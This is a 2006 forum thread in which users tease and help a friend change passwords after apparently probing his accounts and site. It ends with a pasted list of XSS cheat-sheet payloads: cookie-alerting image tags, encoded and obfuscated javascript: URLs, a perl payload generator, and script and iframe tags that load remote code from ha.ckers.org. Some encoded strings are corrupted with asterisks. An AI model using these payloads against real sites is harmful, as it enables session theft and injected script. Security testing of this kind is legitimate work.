My Site

**Troll** · 11-28-2006, 09:31 PM

If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.

**Moonbat** · 11-28-2006, 09:32 PM

He had his PayPal account's password diferent from the begining.

**Troll** · 11-28-2006, 09:34 PM

Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"

**Moonbat** · 11-28-2006, 09:37 PM

Finally trinoid changed his gmail passwords!

**trinoid** · 11-28-2006, 09:38 PM

ya i did changed both passwords and working on the rest

**Troll** · 11-28-2006, 09:38 PM

Yipeeeee!!

**Moonbat** · 11-28-2006, 09:39 PM

Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savy.

**Troll** · 11-28-2006, 09:41 PM

I hope it's the end

**Moonbat** · 11-28-2006, 09:42 PM

I'm bored, now what'll we do?

**Troll** · 11-28-2006, 09:44 PM

I'm bored too...

Brad- change all your passwords back

**trinoid** · 11-28-2006, 09:44 PM

thank you very much

**trinoid** · 11-28-2006, 09:46 PM

ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybee we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish

ill post back on this thread

**Moonbat** · 11-28-2006, 09:49 PM

Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up

<img src='john.jpg' onerror='alert(document.cookie)'>

Here's one I found online

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<IMG SRC=javascript:alert("XSS&quot

>

Yet again

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

Differnet encodings: should output alert(xss) or whatever

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000 058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000 **&#000004*>

<IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x5*&#x5*&#x27&#x2*>

<IMG SRC="jav ascript:alert('XSS');">

Using perl thngy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<iframe src=http://ha.ckers.org/scriptlet.html>

**trinoid** · 11-28-2006, 09:55 PM

what is that?

**Moonbat** · 11-28-2006, 09:58 PM

It can let you run JavaScript commands on a website as if they were coming from the server.

Thread: My Site

Thread Tools

Search Thread

Display

Thank you

Similar Threads

Web site

Posting Permissions